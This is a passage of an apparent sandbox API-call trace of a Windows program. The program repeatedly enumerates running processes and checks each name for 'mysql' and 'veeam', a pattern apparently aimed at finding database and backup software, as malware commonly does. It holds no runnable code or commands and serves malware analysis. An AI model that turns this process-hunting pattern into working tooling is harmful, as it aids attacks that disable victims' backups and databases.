hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0091.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.890] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541f98 [0091.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3541f98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.891] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0091.891] StrStrIA (lpFirst="conhost.exe", lpSrch="mysql") returned 0x0 [0091.891] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.892] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541fb0 [0091.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541fb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.892] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.892] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.892] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0091.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.893] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35421a8 [0091.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x35421a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0091.893] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0091.893] StrStrIA (lpFirst="rxodge.exe", lpSrch="mysql") returned 0x0 [0091.893] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0091.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.895] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35422f8 [0091.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x35422f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0091.895] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0091.895] StrStrIA (lpFirst="sppsvc.exe", lpSrch="mysql") returned 0x0 [0091.895] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 0 [0091.896] CloseHandle (hObject=0x350) returned 1 [0091.896] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0091.911] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0091.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.912] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3536c30 [0091.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3536c30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0091.912] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0091.912] StrStrIA (lpFirst="[System Process]", lpSrch="veeam") returned 0x0 [0091.913] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0091.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0091.914] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547738 [0091.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547738, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0091.914] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0091.914] StrStrIA (lpFirst="System", lpSrch="veeam") returned 0x0 [0091.914] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0091.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.915] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3542118 [0091.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3542118, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0091.915] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0091.915] StrStrIA (lpFirst="smss.exe", lpSrch="veeam") returned 0x0 [0091.915] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0091.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.920] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3542130 [0091.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3542130, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0091.920] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0091.920] StrStrIA (lpFirst="csrss.exe", lpSrch="veeam") returned 0x0 [0091.920] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0091.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.921] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542310 [0091.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3542310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0091.921] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0091.921] StrStrIA (lpFirst="wininit.exe", lpSrch="veeam") returned 0x0 [0091.921] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0091.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.922] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35421c0 [0091.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35421c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0091.922] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0091.922] StrStrIA (lpFirst="csrss.exe", lpSrch="veeam") returned 0x0 [0091.922] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0091.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.924] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542148 [0091.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3542148, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0091.924] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0091.924] StrStrIA (lpFirst="winlogon.exe", lpSrch="veeam") returned 0x0 [0091.924] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0091.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.925] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35421d8 [0091.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x35421d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0091.925] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0091.925] StrStrIA (lpFirst="services.exe", lpSrch="veeam") returned 0x0 [0091.925] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0091.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.926] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35421f0 [0091.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x35421f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0091.926] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0091.926] StrStrIA (lpFirst="lsass.exe", lpSrch="veeam") returned 0x0 [0091.926] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.928] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542178 [0091.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542178, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.928] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.928] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.928] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0091.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.929] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3542268 [0091.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3542268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0091.929] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0091.929] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="veeam") returned 0x0 [0091.929] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0091.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.930] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35420d0 [0091.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35420d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0091.930] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0091.931] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="veeam") returned 0x0 [0091.931] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.932] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542358 [0091.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542358, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.932] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.932] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.932] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0091.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0091.934] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35478a8 [0091.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x35478a8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0091.934] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0091.934] StrStrIA (lpFirst="dwm.exe", lpSrch="veeam") returned 0x0 [0091.934] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.935] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542328 [0091.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542328, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.935] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.936] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.936] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.937] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542208 [0091.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542208, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.937] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.937] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.937] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.938] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542220 [0091.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542220, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.938] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.938] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.938] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.940] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542280 [0091.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542280, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.940] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.940] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.940] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.941] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542250 [0091.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.941] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.941] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.941] Process32NextW 